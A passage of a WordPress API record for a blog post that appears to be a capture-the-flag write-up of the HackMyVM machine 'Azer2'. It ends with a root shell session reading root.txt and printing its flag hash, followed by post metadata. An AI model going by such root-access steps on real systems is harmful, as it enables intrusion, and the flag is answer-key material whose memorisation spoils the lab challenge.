groups=0(root)\ncd \/root\nls\nroot.txt\ncat root.txt\nb5d96aec2d5f1541c5e7910ccab527d8<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Azer2 Today is my first time trying a hackmyvm machine, and I want to try solving it on my own. I open it and get the familiar error: Ugh. Trying to configure [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":115,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-397","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/397","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=397"}],"version-history":[{"count":3,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/397\/revisions"}],"predecessor-version":[{"id":400,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/397\/revisions\/400"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media\/115"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=397"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=397"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/t
ags?post=397"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}